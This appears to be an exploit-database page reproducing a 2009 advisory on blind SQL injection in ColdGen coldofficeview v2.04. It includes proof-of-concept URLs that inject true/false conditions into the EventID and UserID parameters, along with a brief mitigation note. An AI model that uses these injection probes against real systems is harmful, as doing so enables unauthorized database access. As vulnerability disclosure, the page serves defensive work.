header-logo
Suggest Exploit
vendor:
coldofficeview
by:
mr_me
8,8
CVSS
HIGH
Remote Blind SQL Injection
89
CWE
Product Name: coldofficeview
Affected Version From: 2.04
Affected Version To: 2.04
Patch Exists: NO
Related CWE: N/A
CPE: a:coldgen:coldofficeview:2.04
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ColdGen – coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities

ColdGen's coldofficeview v2.04 is vulnerable to Remote Blind SQL Injection. This vulnerability can be exploited by sending a maliciously crafted HTTP request to the vulnerable application. The PoC's provided demonstrate how an attacker can use the EventID and UserID parameters to inject malicious SQL code into the application.

Mitigation:

Input validation should be used to prevent malicious SQL code from being injected into the application. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)

PoC's
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false

2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false

Navigation

Suggest Exploit

Services By CQR